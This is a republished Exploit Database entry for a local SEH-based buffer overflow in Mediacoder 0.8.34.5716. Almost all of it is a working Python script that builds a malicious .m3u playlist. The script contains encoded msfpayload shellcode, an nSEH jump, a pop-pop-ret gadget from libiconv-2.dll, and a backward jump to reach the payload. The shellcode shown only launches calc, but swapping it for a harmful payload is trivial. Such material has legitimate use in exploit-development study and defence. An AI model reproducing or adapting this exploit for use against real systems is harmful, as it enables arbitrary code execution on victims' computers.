Mediacoder 0.8.34.5716 – ‘.m3u’ Local Buffer Overflow (SEH)

• Exploit Database
• 86 阅读

• 作者： evil_comrade
  日期： 2015-05-06
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/36920/

• #!/usr/bin/python
  # Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u)
  # Date: 05/May/2015
  # Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
  # email: kwiha2003 [at ]yahoo [dot] com 
  # Version: 0.8.34.5716
  # Tested on: Win XP3
  # Vendor: http://www.mediacoderhq.com/
  # Software link: http://www.mediacoderhq.com/getfile.htm?site=mediacoder.info&file=MediaCoder-0.8.34.5716.exe
  
  # Greetz: b33f,corelan,offsec,vulnhub,HUST510
  # Notes: Due to insifficient space after taking control of the EIP, you have to jump backwards and also 
  #avoid a few bad bytes after the "A"s.
  
  #!/usr/bin/python
  buffersize = 853
  buffer = ("http://" + "\x41" * 256)
  #Space for shellcode to decode
  buffer += "\x90" * 24
  # msfpayload windows/exec CMD=calc R|msfencode -b "\x00\x0a\x0d\x20" -t c -e x86/shikata_ga_nai
  #[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)
  #unsigned char buf[] = 
  buffer +=("\xdd\xc1\xbd\xc4\x15\xfd\x3a\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
  "\x32\x31\x6f\x17\x03\x6f\x17\x83\x2b\xe9\x1f\xcf\x4f\xfa\x69"
  "\x30\xaf\xfb\x09\xb8\x4a\xca\x1b\xde\x1f\x7f\xac\x94\x4d\x8c"
  "\x47\xf8\x65\x07\x25\xd5\x8a\xa0\x80\x03\xa5\x31\x25\x8c\x69"
  "\xf1\x27\x70\x73\x26\x88\x49\xbc\x3b\xc9\x8e\xa0\xb4\x9b\x47"
  "\xaf\x67\x0c\xe3\xed\xbb\x2d\x23\x7a\x83\x55\x46\xbc\x70\xec"
  "\x49\xec\x29\x7b\x01\x14\x41\x23\xb2\x25\x86\x37\x8e\x6c\xa3"
  "\x8c\x64\x6f\x65\xdd\x85\x5e\x49\xb2\xbb\x6f\x44\xca\xfc\x57"
  "\xb7\xb9\xf6\xa4\x4a\xba\xcc\xd7\x90\x4f\xd1\x7f\x52\xf7\x31"
  "\x7e\xb7\x6e\xb1\x8c\x7c\xe4\x9d\x90\x83\x29\x96\xac\x08\xcc"
  "\x79\x25\x4a\xeb\x5d\x6e\x08\x92\xc4\xca\xff\xab\x17\xb2\xa0"
  "\x09\x53\x50\xb4\x28\x3e\x3e\x4b\xb8\x44\x07\x4b\xc2\x46\x27"
  "\x24\xf3\xcd\xa8\x33\x0c\x04\x8d\xcc\x46\x05\xa7\x44\x0f\xdf"
  "\xfa\x08\xb0\x35\x38\x35\x33\xbc\xc0\xc2\x2b\xb5\xc5\x8f\xeb"
  "\x25\xb7\x80\x99\x49\x64\xa0\x8b\x29\xeb\x32\x57\xae")
  buffer += "\x42" * 350
  nseh = "\xEB\x06\x90\x90"
  # 0x660104ee : pop edi # pop ebp # ret| [libiconv-2.dll] 
  seh="\xee\x04\x01\x66"
  #Jump back 603 bytes due to insufficient space for shellcode
  jmpbck = "\xe9\xA5\xfd\xff\xff"
  junk = ("D" * 55) 
  f= open("exploit.m3u",'w')
  f.write(buffer + nseh + seh + jmpbck + junk)
  f.close()
  

  PowerShell

  Copy